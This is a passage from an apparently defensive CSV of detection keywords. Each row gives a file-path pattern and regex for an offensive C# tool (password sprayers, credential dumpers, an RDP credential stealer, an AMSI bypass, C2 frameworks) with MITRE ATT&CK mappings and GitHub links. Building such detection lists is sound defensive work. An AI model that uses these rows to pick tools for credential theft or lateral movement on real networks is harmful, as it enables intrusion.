tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpHose.exe*",".{0,1000}\\SharpHose\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpHose.exe*",".{0,1000}\\SharpHose\.exe.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","10","4","301","63","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z" "*\SharpHose\Program.cs*",".{0,1000}\\SharpHose\\Program\.cs.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","10","4","301","63","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z" "*\SharpHound.exe*",".{0,1000}\\SharpHound\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpHound.html*",".{0,1000}\\SharpHound\.html.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "*\SharpHoundCommon\*",".{0,1000}\\SharpHoundCommon\\.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*\SharpKatz.exe*",".{0,1000}\\SharpKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\Sharp-Killer.sln*",".{0,1000}\\Sharp\-Killer\.sln.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","0","N/A","10","4","338","41","2024-01-25T09:24:57Z","2023-10-21T17:27:59Z" "*\SharpLAPS.exe*",".{0,1000}\\SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpLDAP\*",".{0,1000}\\SharpLDAP\\.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","0","N/A","8","N/A","N/A","N/A","N/A","N/A" "*\SharpMapExec.exe*",".{0,1000}\\SharpMapExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpMiniDump.exe*",".{0,1000}\\SharpMiniDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpMove.exe*",".{0,1000}\\SharpMove\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","635","108","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*\SharpMove.exe*",".{0,1000}\\SharpMove\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpNamedPipePTH.exe*",".{0,1000}\\SharpNamedPipePTH\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpNoPSExec*",".{0,1000}\\SharpNoPSExec.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","587","88","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*\SharpNoPSExec.exe*",".{0,1000}\\SharpNoPSExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpPersistSD.cs*",".{0,1000}\\SharpPersistSD\.cs.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*\SharpPersistSD.dll*",".{0,1000}\\SharpPersistSD\.dll.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*\SharpPersistSD.sln*",".{0,1000}\\SharpPersistSD\.sln.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*\SharpPrinter.exe*",".{0,1000}\\SharpPrinter\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common 
C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\sharprdp.exe*",".{0,1000}\\sharprdp\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\SharpRDP.exe*",".{0,1000}\\SharpRDP\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpRDP\*",".{0,1000}\\SharpRDP\\.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*\SharpRDPHijack*",".{0,1000}\\SharpRDPHijack.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","0","N/A","10","5","407","71","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" "*\SharpRDPThief\*",".{0,1000}\\SharpRDPThief\\.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*\SharpReg.exe*",".{0,1000}\\SharpReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpRoast.exe*",".{0,1000}\\SharpRoast\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\SharpRoast.json*",".{0,1000}\\SharpRoast\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\SharpSCCM.exe*",".{0,1000}\\SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpSearch.exe*",".{0,1000}\\SharpSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpSecDump.exe*",".{0,1000}\\SharpSecDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpShares.exe*",".{0,1000}\\SharpShares\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpShares\*",".{0,1000}\\SharpShares\\.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*\SharpShares-master*",".{0,1000}\\SharpShares\-master.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - 
TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*\Sharp-SMBExec.exe*",".{0,1000}\\Sharp\-SMBExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpSniper.exe*",".{0,1000}\\SharpSniper\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpSphere.exe*",".{0,1000}\\SharpSphere\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpSploit.csproj*",".{0,1000}\\SharpSploit\.csproj.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*\SharpSploit.dll*",".{0,1000}\\SharpSploit\.dll.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*\SharpSploit.xml*",".{0,1000}\\SharpSploit\.xml.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - 
T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*\SharpSploitConsole.*",".{0,1000}\\SharpSploitConsole\..{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*\SharpSploit-master*",".{0,1000}\\SharpSploit\-master.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*\SharpSpray.csproj*",".{0,1000}\\SharpSpray\.csproj.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*\SharpSpray.exe*",".{0,1000}\\SharpSpray\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpSpray.exe*",".{0,1000}\\SharpSpray\.exe.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*\sharpspray.exe*",".{0,1000}\\sharpspray\.exe.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*\SharpSpray.sln*",".{0,1000}\\SharpSpray\.sln.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*\SharpSpray\*",".{0,1000}\\SharpSpray\\.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential 
Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*\SharpSpray-1.1.zip*",".{0,1000}\\SharpSpray\-1\.1\.zip.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*\SharpSQLPwn.exe*",".{0,1000}\\SharpSQLPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpStay.exe*",".{0,1000}\\SharpStay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# 